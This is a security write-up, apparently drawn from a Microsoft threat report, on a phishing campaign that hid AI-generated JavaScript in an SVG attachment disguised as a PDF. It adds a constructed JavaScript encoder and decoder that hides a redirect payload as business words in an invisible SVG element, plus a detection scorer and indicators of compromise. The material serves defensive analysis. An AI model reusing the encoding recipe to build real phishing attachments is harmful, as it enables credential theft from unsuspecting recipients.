A recent credential phishing campaign detected by Microsoft Threat Intelligence used code, likely generated by AI, inside SVG files to hide malicious behavior.
The novel obfuscation showed the attackers' ingenuity, but AI-powered defenses still blocked the attack. The case suggests that AI-augmented threats remain detectable when defenders adapt their analytical strategies.
On August 18, Microsoft Threat Intelligence identified a targeted phishing campaign that used compromised small-business email accounts to distribute credential-stealing emails.
The attacker attached a file named “23MB – PDF-6 Pages.SVG”, designed to pose as a PDF despite its SVG extension. SVG is increasingly favored by threat actors because it is a text format that can embed JavaScript and dynamic content, and it lends itself to sophisticated obfuscation that frustrates static analysis and can slip past sandboxes.
Once opened, the SVG redirected the user to a CAPTCHA-style verification page, a familiar social-engineering tactic for building trust and suppressing suspicion before the real lure appears.

Microsoft Defender blocked access before the fake login page was displayed, but investigation revealed that JavaScript embedded in the SVG reconstructs a phishing landing page to harvest credentials.
Business Terminology as a Decoy
Rather than using standard cryptographic obfuscation, the attacker disguised the payload in simulated business-analytics language.
First, the SVG began with invisible elements styled as a “Business Performance Dashboard”: chart bars and month labels rendered with zero opacity and transparent fills, intended to mislead anyone inspecting the file.
Second, the actual payload was encoded as a long sequence of business-related terms (e.g., revenue, operations, risk, shares) stored in a hidden data-analytics attribute on an invisible element.

Embedded JavaScript processed these terms through multiple conversion steps, mapping the sequence of business terms to characters and instructions.
When run, the script systematically decoded this hidden metadata to rebuild the functionality for redirection, browser fingerprinting, and session tracking.
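The following is an added example, not code from the campaign or from Microsoft's report. It reconstructs the idea behind the "business terms as a codebook" obfuscation described above: a decoy dashboard whose elements are invisible, a payload hidden as a sequence of business words in a data-analytics attribute, and a multi-step decoder that turns the words back into bytes and then into a string. The codebook, the sixteen terms, the payload and the example.invalid URL are all constructed for illustration; the real sample's mapping is not published on this page.

```javascript
// Added example: constructed reconstruction of a term-codebook SVG payload.
// Nothing here is the attacker's code; the codebook and payload are assumptions.

// Sixteen business terms, one per hex nibble, so two terms encode one byte.
const TERMS = [
  'revenue', 'operations', 'risk', 'shares', 'growth', 'margin', 'forecast', 'pipeline',
  'churn', 'budget', 'equity', 'assets', 'liquidity', 'dividend', 'valuation', 'turnover',
];
const CODEBOOK = Object.fromEntries(TERMS.map((term, nibble) => [term, nibble]));

// Attacker-side conversion: payload string -> UTF-8 bytes -> two business terms per byte.
function encodeAsTerms(payload) {
  const words = [];
  for (const b of Buffer.from(payload, 'utf8')) {
    words.push(TERMS[b >> 4], TERMS[b & 0x0f]);
  }
  return words.join(' ');
}

// Decoder-side conversion: business terms -> nibbles -> bytes -> string.
function decodeTerms(termString) {
  const words = termString.trim().split(/\s+/);
  if (words.length % 2 !== 0) throw new Error('term sequence must have even length');
  const bytes = [];
  for (let i = 0; i < words.length; i += 2) {
    const hi = CODEBOOK[words[i]];
    const lo = CODEBOOK[words[i + 1]];
    if (hi === undefined || lo === undefined) throw new Error(`unknown term near index ${i}`);
    bytes.push((hi << 4) | lo);
  }
  return Buffer.from(bytes).toString('utf8');
}

// Builds the decoy: a "Business Performance Dashboard" drawn with zero opacity and
// transparent fills, plus an invisible element carrying the encoded payload.
function buildDecoySvg(payload) {
  return `<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="640" height="360">
  <g id="dashboard" opacity="0">
    <text x="20" y="30" fill="transparent">Business Performance Dashboard</text>
    <rect x="40" y="80" width="30" height="120" fill="transparent"/>
    <rect x="90" y="60" width="30" height="140" fill="transparent"/>
    <text x="40" y="220" fill="transparent">Jan</text>
    <text x="90" y="220" fill="transparent">Feb</text>
  </g>
  <g id="kpi-metrics" opacity="0" data-analytics="${encodeAsTerms(payload)}"></g>
  <script><![CDATA[
    // In the real sample this block held the decoder; here it is deliberately inert.
  ]]></script>
</svg>`;
}

// Analyst-side recovery: pull the hidden term list out of the SVG text and decode it.
// A regex suffices because the attribute is a flat word list; a production triage tool
// should parse the XML instead of trusting one pattern.
function recoverPayload(svgText) {
  const m = svgText.match(/data-analytics="([^"]*)"/);
  return m ? decodeTerms(m[1]) : null;
}

// Constructed payload: the decoded text is JavaScript that the in-SVG script would hand
// to Function() or eval() to redirect the victim. It is never executed here.
const PAYLOAD = 'location.replace("https://example.invalid/verify")';
const SAMPLE_SVG = buildDecoySvg(PAYLOAD);

console.log('recovered payload:', recoverPayload(SAMPLE_SVG));
```

Running the block with node prints the recovered payload. The point for an analyst is that once the codebook and the conversion steps are identified, the whole "dashboard" collapses to a few lines of redirect and tracking logic; the obfuscation buys the attacker evasion of naive string matching, not secrecy.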
A Microsoft Security Copilot analysis assessed the SVG code as likely generated by a large language model, citing its verbose and redundant naming conventions (e.g., processBusinessMetricsf43e08), modular yet over-engineered structure, generic formal comments, and unnecessary inclusion of XML declarations and CDATA wrappers.
These properties are typical artifacts of AI-generated code and provided additional detection signals.
Such systematic over-engineering and generalization of a solution is a hallmark of AI/LLM output.

Despite the AI-assisted obfuscation, the AI-driven protections in Microsoft Defender for Office 365 thwarted the campaign by analyzing infrastructure, behavior, and message context rather than the payload code alone.
Key detection signals included self-addressed emails with the real recipients hidden in BCC, redirection to domains linked to phishing infrastructure, the suspicious choice of an SVG file named like a PDF, known phishing content, common code-obfuscation patterns, and network behaviors such as session tracking and fingerprinting.
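As an added example, not Microsoft Defender's detection logic, the block below scores an SVG attachment on context and behavior signals of the kind listed above instead of trying to understand the obfuscated payload. The signal names, weights, block threshold, and both sample attachments (including the fabricated sender and recipient addresses) are constructed for illustration.

```javascript
// Added example: constructed context-based triage for SVG e-mail attachments.
// Weights and the threshold are arbitrary assumptions, not a vendor's tuning.

// Each signal inspects the file name, the SVG text, or the message envelope.
const SIGNALS = [
  { name: 'svg-named-like-pdf', weight: 3,
    test: ({ filename }) => /\.svg$/i.test(filename) && /\b(pdf|pages?|mb)\b/i.test(filename) },
  { name: 'embedded-script', weight: 2,
    test: ({ svg }) => /<script[\s>]/i.test(svg) },
  { name: 'cdata-wrapper', weight: 1,
    test: ({ svg }) => /<!\[CDATA\[/.test(svg) },
  { name: 'invisible-decoy-elements', weight: 2,
    // several elements hidden with zero opacity or transparent fill
    test: ({ svg }) => (svg.match(/opacity="0"|fill="transparent"/g) || []).length >= 3 },
  { name: 'long-word-list-in-data-attribute', weight: 3,
    // a data-* attribute holding dozens of words is a codebook-style hidden payload
    test: ({ svg }) => [...svg.matchAll(/data-[\w-]+="([^"]*)"/g)]
      .some((m) => m[1].trim().split(/\s+/).length >= 40) },
  { name: 'redirect-api', weight: 2,
    test: ({ svg }) => /location\.(replace|assign|href)|window\.open\(/.test(svg) },
  { name: 'fingerprint-or-tracking-api', weight: 2,
    test: ({ svg }) => /navigator\.userAgent|screen\.(width|height)|document\.cookie|localStorage/.test(svg) },
  { name: 'self-addressed-bcc-delivery', weight: 3,
    // sender is the only visible recipient; real targets sit in BCC
    test: ({ mail }) => Boolean(mail) && mail.to.length === 1 && mail.to[0] === mail.from && mail.bcc.length > 0 },
];

const BLOCK_THRESHOLD = 8;

function triageSvgAttachment({ filename, svg, mail }) {
  const matched = SIGNALS.filter((s) => s.test({ filename, svg, mail }));
  const score = matched.reduce((sum, s) => sum + s.weight, 0);
  return { score, hits: matched.map((s) => s.name), verdict: score >= BLOCK_THRESHOLD ? 'block' : 'allow' };
}

// Constructed malicious attachment shaped like the reported one: PDF-like name, invisible
// dashboard, a long business-term list in a data attribute, redirect and fingerprint calls,
// delivered self-addressed with the targets in BCC.
const MALICIOUS = {
  filename: '23MB – PDF-6 Pages.SVG',
  mail: { from: 'owner@smallbiz.example', to: ['owner@smallbiz.example'], bcc: ['a@corp.example', 'b@corp.example'] },
  svg: `<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <g opacity="0"><text fill="transparent">Business Performance Dashboard</text><rect fill="transparent"/></g>
  <g opacity="0" data-analytics="${Array.from({ length: 48 }, (_, i) => ['revenue', 'operations', 'risk', 'shares'][i % 4]).join(' ')}"></g>
  <script><![CDATA[
    var fp = navigator.userAgent + screen.width;
    location.replace("https://example.invalid/verify?s=" + fp);
  ]]></script>
</svg>`,
};

// Constructed benign attachment: a plain vector logo from a normal sender.
const BENIGN = {
  filename: 'logo.svg',
  mail: { from: 'design@vendor.example', to: ['owner@smallbiz.example'], bcc: [] },
  svg: `<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
  <circle cx="12" cy="12" r="10" fill="#0078d4"/>
  <path d="M8 12l3 3 5-6" stroke="#fff" stroke-width="2" fill="none"/>
</svg>`,
};

console.log(triageSvgAttachment(MALICIOUS));
console.log(triageSvgAttachment(BENIGN));
```

None of the signals depends on decoding the payload, which is the practical lesson of the campaign: a file named like a PDF, an invisible "dashboard", a data attribute stuffed with words, and a self-addressed message with BCC recipients are each cheap to check and survive whatever naming scheme the next AI-generated variant uses.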
To strengthen defenses against similar AI-assisted phishing threats, organizations should:
- Enable link protection and the recommended security settings in Microsoft Defender for Office 365.
- Enable Zero-hour auto purge (ZAP) to retroactively quarantine malicious emails.
- Use browsers with SmartScreen filtering to block known phishing sites.
- Turn on cloud-delivered protection in antivirus solutions for rapid coverage of new attack variants.
- Use phishing-resistant authentication methods and enforce Conditional Access policies that require strong authentication for critical applications.
As adversaries integrate AI into their offensive toolkits, security teams must continue to leverage AI-driven analytics that focus on attack patterns, infrastructure traits, and behavioral anomalies.
Although AI-generated obfuscation will keep evolving, shifting detection beyond code syntax to the broader context of phishing tactics lets defenders stay ahead of new threats.
Indicators of compromise
| Indicator | Type | Description | First seen | Last seen |
|---|---|---|---|---|
| kmnl[.]cpfcenters[.]de | Domain | Domain hosting phishing content | 08/18/2025 | 08/18/2025 |
| 23MB – PDF-6 Pages[.]SVG | File name | SVG attachment file name | 08/18/2025 | 08/18/2025 |
